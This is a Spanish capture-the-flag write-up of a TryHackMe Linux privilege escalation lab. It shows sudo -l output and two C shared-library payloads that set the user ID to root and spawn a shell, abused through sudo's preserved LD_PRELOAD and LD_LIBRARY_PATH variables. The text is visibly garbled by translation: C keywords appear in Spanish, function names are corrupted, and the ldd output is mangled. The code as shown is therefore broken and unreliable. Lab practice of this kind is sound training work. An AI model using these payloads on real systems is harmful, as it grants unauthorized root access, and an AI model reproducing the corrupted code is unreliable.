[TryhackMe] Escalación de privilegios utilizando las variables de entorno ld_preload y ld_library_path! Linux Privesc Escribir parte 4

└─ $ ssh user@10.10.6.35 La autenticidad del host '10 .10.6.35 (10.10.6.35) 'no se puede establecer. DSA Key Fingerprint es SHA256: P2NSSFVYJVK1QE0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Esta clave no se sabe por otros nombres, ¿está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.6.35 '(DSA) a la lista de hosts conocidos. User@10.10.6.35's contraseña: Linux Debian 2.6.32-5-amd64 #1 SMP martes 13 de mayo 16:34:35 UTC 2014 x86_64 Los programas incluidos con el sistema GNU/Linux Debian son software gratuito; Los términos de distribución exactos para cada programa se describen en los archivos individuales en/usr/share/doc/*/copyright. Debian GNU/Linux no tiene absolutamente ninguna garantía, en la medida permitida por la ley aplicable. Último inicio de sesión: viernes 15 de mayo 06:41:23 2020 desde 192.168.1.125 Usuario@Debian: ~ $ sudo -l Entradas predeterminadas de coincidencia para el usuario en este host: env_reset, env_keep+= ld_preload, env_ senck+= ld_library_path

Usuario@Debian: ~ $ sudo -l Entradas de default de coincidencia para el usuario en este host: Env_Reset, Env_Keep+= LD_PReload, Env_Keep+= LD_Library_Path User User puede ejecutar los siguientes comandos en este host: (root) Nopasswd:/usr/sbin/iftop (root) nopasswd:/usr/bin/find (root (root) no /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/bin/man (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/menos (root) nopasswd:/usr/bin/ftp (root) nopasswd: nMaP/bin/bin) (root) nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/más

Usuario@Debian: ~ $ Cat /home/user/tools/sudo/preload.c #include<stdio.h> #incluir<sys/types.h> #incluir<stdlib.h> void _init () {unsetenv ("ld_preload"); setResuid (0,0,0); sistema ("/bin/bash -p"); }

Usuario@Debian: ~ $ GCC -fpic -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

Usuario@Debian: ~ $ sudo ld_preload =/tmp/preload.sO busca root@Debian:/home/user# whoami root

usuario@debian: ~ $ ldd/usr/sbin/apache2 linux-vdo.so.1 => (0x0000007fff84ee8000) libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fba94c5c000) liBapRutil-1.0 = /usr/lib/libaprutil-1.so.0 (0x00007fba94a38000) libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fba94a38000) libaprutil-1.so.0 => /usr/lib/libaprutil-1so.0.0) (0x00007fba947fe000) libpThread.so.0 => /lib/libpthread.so.0 (0x00007fba945e2000) libc.so.6 => /lib/libc.so.6 (0x00007fba94276000) libuuid.so.1 => /libuid.1 (0x00007fba94071000) libt.so.1 => /lib/libt.so.1 (0x0000007fba93e69000) libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fba93c32000) libdl.so.2 => /lib /libdl.2.2.2.2.2.2.2.2.2.2.2.2.2.2. (0x00007fba93a2d000) libexpat.so.1 => /usr/lib/libexpat.so.1 (0x0000007fba93805000) /lib64/ld-linux-x86-64.so.2 (0x0000007fba9511000)

Usuario@Debian: ~ $ Cat /home/user/tools/sudo/library_path.c #include<stdio.h> #incluir<stdlib.h> static void secuk () __attribute __ ((constructor)); vacío hijack () {unsetenv ("ld_library_path"); setResuid (0,0,0); sistema ("/bin/bash -p"); }

Usuario@Debian: ~ $ GCC -O /TMP/LIBCRYPT.SO.1 -shared -fpic /home/user/tools/sudo/library_path.c

usuario@debian: ~ $ sudo ld_library_path =/tmp apache2 apache2: /tmp/libcrypt.so.1: no hay información de versión disponible (requerida por /usr/lib/libaprutil-1.so.0) root@debian:/home/user# whoami root